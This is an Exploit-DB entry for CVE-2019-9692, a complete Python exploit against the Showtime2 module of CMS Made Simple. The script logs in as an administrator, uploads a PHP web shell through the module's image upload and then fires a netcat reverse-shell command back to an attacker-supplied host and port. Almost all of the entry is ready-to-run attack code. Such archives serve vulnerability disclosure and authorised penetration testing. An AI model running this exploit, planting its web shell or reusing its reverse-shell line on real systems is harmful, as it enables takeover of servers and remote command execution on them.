CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

EDB-ID:

46546




Platform:

PHP

Date:

2019-03-15


#!/usr/bin/env python
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
# Date: March 2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
# Version: Showtime2 module <= 3.6.2
# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04
# CVE : 2019-9692

import requests
import optparse
from requests_toolbelt.multipart.encoder import MultipartEncoder

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)")
parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")
parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")
parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")
parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")
options, args = parser.parse_args()

if not options.url:
    print "[-] Specify an uri target"
    exit()

if not options.username:
    print "[-] Specify an username for login in administrator panel"
    exit()

if not options.password:
    print "[-] Specify a password for login in administrator panel"
    exit()

base_uri = options.url
url_login = base_uri + "/admin/login.php"
user = options.username
password = options.password
session = requests.Session()
__c_var = ""
lhost = options.local
lport = options.port

# Login in administrator panel for get the csrf token
def login(username, password):
    print "[*] Login to cms"
    global __c_var
    credentials = {"username": username, "password": password, "loginsubmit": "Submit"}
    response = session.post(url_login, data=credentials, allow_redirects=False)
    __c_var = response.headers['Location'].split("__c=")[1]
    print "[*] Token value: " + __c_var

# upload a php script with reverse shell in vulnerable functionality
def upload_shell():
    print "[*] Uploading webshell"
    multipart_data = MultipartEncoder(
        fields = {
            'm1_input_browse': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'text/plain'),
            '__c': __c_var,
            'mact': 'Showtime2,m1_,defaultadmin,0',
            'm1_upload_submit': 'Upload'
        }
    )
    response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
                      headers={'Content-Type': multipart_data.content_type})

# Call the script uploaded for spawn a reverse shell
def spawn_shell():
    print "[*] Spawn a shell to " + lhost + ":" + str(lport)
    payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"}
    requests.post(base_uri + "/uploads/images/shell.php", data=payload)

login(user, password)
upload_shell()
spawn_shell()